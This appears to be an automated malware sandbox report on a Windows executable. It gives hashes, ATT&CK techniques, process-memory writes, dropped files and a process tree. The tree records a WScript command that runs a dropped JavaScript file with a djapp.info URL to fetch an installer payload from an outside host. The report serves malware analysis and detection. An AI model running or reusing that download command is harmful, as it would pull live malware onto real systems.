685c708f5d2fb1e512c4104db46e3892535505e97a2414488878c5f5fe03c2c6

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/05/2024, 09:11

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe
Size

184KB
MD5

7c6f5212d5a4213df25ab1dad98a56d6
SHA1

783ac15fef1099acf74387e4e33a62679e75dd49
SHA256

685c708f5d2fb1e512c4104db46e3892535505e97a2414488878c5f5fe03c2c6
SHA512

b2d9776d4a91daa86ba038663650dc397c9987e9506c9ad20394d04ae33575e5f8ec2f3cf243dd9b39fbb663c749c5eb7e0eb36f174a2347457e2e413ddeb78d
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3E:/7BSH8zUB+nGESaaRvoB7FJNndnx

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2052	WScript.exe
8	2052	WScript.exe
10	2052	WScript.exe
12	2464	WScript.exe
13	2464	WScript.exe
15	2736	WScript.exe
16	2736	WScript.exe
18	1500	WScript.exe
19	1500	WScript.exe
21	2880	WScript.exe
22	2880	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
840	2196	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 2052	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	28
PID 2196 wrote to memory of 2052	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	28
PID 2196 wrote to memory of 2052	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	28
PID 2196 wrote to memory of 2052	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	28
PID 2196 wrote to memory of 2464	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	30
PID 2196 wrote to memory of 2464	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	30
PID 2196 wrote to memory of 2464	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	30
PID 2196 wrote to memory of 2464	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	30
PID 2196 wrote to memory of 2736	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	32
PID 2196 wrote to memory of 2736	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	32
PID 2196 wrote to memory of 2736	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	32
PID 2196 wrote to memory of 2736	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	32
PID 2196 wrote to memory of 1500	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	34
PID 2196 wrote to memory of 1500	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	34
PID 2196 wrote to memory of 1500	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	34
PID 2196 wrote to memory of 1500	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	34
PID 2196 wrote to memory of 2880	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	36
PID 2196 wrote to memory of 2880	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	36
PID 2196 wrote to memory of 2880	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	36
PID 2196 wrote to memory of 2880	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	36
PID 2196 wrote to memory of 840	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	38
PID 2196 wrote to memory of 840	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	38
PID 2196 wrote to memory of 840	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	38
PID 2196 wrote to memory of 840	2196	7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7c6f5212d5a4213df25ab1dad98a56d6_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4A2.js" http://www.djapp.info/?domain=QlAktSeDgP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf4A2.exe
  2⤵
  - Blocklisted process makes network request
  PID:2052
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4A2.js" http://www.djapp.info/?domain=QlAktSeDgP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf4A2.exe
  2⤵
  - Blocklisted process makes network request
  PID:2464
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4A2.js" http://www.djapp.info/?domain=QlAktSeDgP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf4A2.exe
  2⤵
  - Blocklisted process makes network request
  PID:2736
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4A2.js" http://www.djapp.info/?domain=QlAktSeDgP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf4A2.exe
  2⤵
  - Blocklisted process makes network request
  PID:1500
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4A2.js" http://www.djapp.info/?domain=QlAktSeDgP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf4A2.exe
  2⤵
  - Blocklisted process makes network request
  PID:2880
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 472
  2⤵
  - Program crash
  PID:840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
489a89b0a557696c6e623ab2079b74f7

SHA1
8775908130d6c010958c9ed6618e81708a17e411

SHA256
38185bd55754c319f0e381646cac1a4aeea31ee9a58ce47badc48df019b129d9

SHA512
01af148c30a65ffa93e68741d3a71a6c5e59842cb328c426cd4661aeb7cc756452309feb54fbcd46efaeffb1fb060ec7858511ea16be7c8df255f24cff2e7a62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
0571d195d06bb5446bd565e771e8d9c3

SHA1
b45807e6fb997faee03a6f253813233d810b1f5e

SHA256
a0b76fcfccdb6f3b3ff70d8abb8425fc0654dc17e689d1055995b1046d4ca672

SHA512
d31c1cf122df1d491a0bf814f894716ff80a719d1965dcd74a9f877f425a406d74ae8e7b2bcd4334c648012d21160a965f44bc6efb025f2bafdde96f48e09e13

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f84f5b5bc89844f25a41facc8cc7515c

SHA1
314344bbc991a867d1a8ef479f6f9a14bd045450

SHA256
581d500bc5fee4656ea76fd9382d6d44cd55aa1c3d4cd2984baa9b43bc8b7dc5

SHA512
dd1913086daa7a58523ac6771c3e5cf08c190b0cf87cc1afa77fb25c414a11ed720da3a634c6af80d71fd355ed55909df77b40dcee86a6cdc44048b2c57bda94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
c401e5bb5bda569a6f6c185424b75b15

SHA1
71ca34bc1e5d80f032af5efe24c0c6bf845e9255

SHA256
727990c65abacf533cbc40162e3d1f1ca0b5928441be9ddc17a568f0ff05ed6c

SHA512
cf8d864ec5950afa259598590e0d20cd05e2f76206c27a272d3851b74ae46dbebf86a4a31c3b237641796732d2eae2e1875c3d08bfb26ec7444bce74df690a71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
46a3b41057837d515a507b43283de02f

SHA1
43d220b630791986139e2eb3952eecc600439d14

SHA256
cb546049445fba0734e470e4faa052e89b3a4e3d87c852b687d677e95e9c935e

SHA512
0ccd912de77a84021b330c5a3d51919cdf2c2b2a6b8e3ff6e6ac73febff88c4c9884004eea83ed29eef7a5a3c2bd14d5f4154aaec807484f57eceb833f7e852d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
476e7591cb88cd69baf79cb398ef44f4

SHA1
3cc752517777776db6622bda842ad345720c0f1b

SHA256
455a728fc06871b8a5b511bb3f22686c370aff22ec53b284c60b26a0fc5ac816

SHA512
4b3d34b132a1ad5303a85835a767a0564162db0c67c20d7e6af9d8701f215c74956a6916d714313ab111387fcdb295181d7e747b6dee8d94bd593bf71b970e3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
086f9850d01c780fe2fecbd5771f154f

SHA1
8bfac6fab2e21446b835d039c7c976723f868e7d

SHA256
874f13acb15187029de1c8464f01a736417db51e8735b44532707fb77e1d6030

SHA512
354178719137c0b323070726386903ca670be94121521e2ebb67811d2237eddb73c92bcbbcf8bc507dff5d45193755ac17220e9402033b95506bd059f0630f43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
6KB

MD5
e0a76e8f90aea4223b6119c4fe246872

SHA1
a417be360c13e9110132796e0f4a532043feb849

SHA256
6b33109709e2a29efdcc9708ce9b5ea8cb034570a69b6335b01deedd0e15bece

SHA512
7435e5957f71e96898b403a29d6d266a699fe15bfc516f2014524c2fa8511b722bc7765b3835265bab353b1c093e9bff1c68cb915e2da2f55215216cacca7325

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
6KB

MD5
9cb916bc2c862317128a46e7e79e002c

SHA1
ef611486bfd4469cb49f74ade1dff613b36169ad

SHA256
c55bd1707691917b7a09f839e979e25817057832e57b81306a5a968da9b74366

SHA512
cb40d3f0c7062bda7526ac2ac53814b95c3a7d9cbd7d06d29e0cd23e5d4d335d92a7d7e88b8f42ff2bc080646f7bc2d72c0b034f2adfc7a2832074a917a3570f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab341B.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4C7C.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf4A2.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TJDKHD74.txt

Filesize
175B

MD5
c345b02e1dacbb5d24af16ac26ec0883

SHA1
20a932b0546833e24c296d6ad8a8967db5ac7982

SHA256
fe1b0632cdedf29d1681855ffa93f443425b5eb355e69b8829faee748bf52a70

SHA512
d49522f780af8ff497adf54af014d03f1c0d4bd24a3e81da7f650db873cc6e3c2c39f806810813b70a025dda544b7de92263628fc73fdbc8b89a32dcb69d1959

Download Submit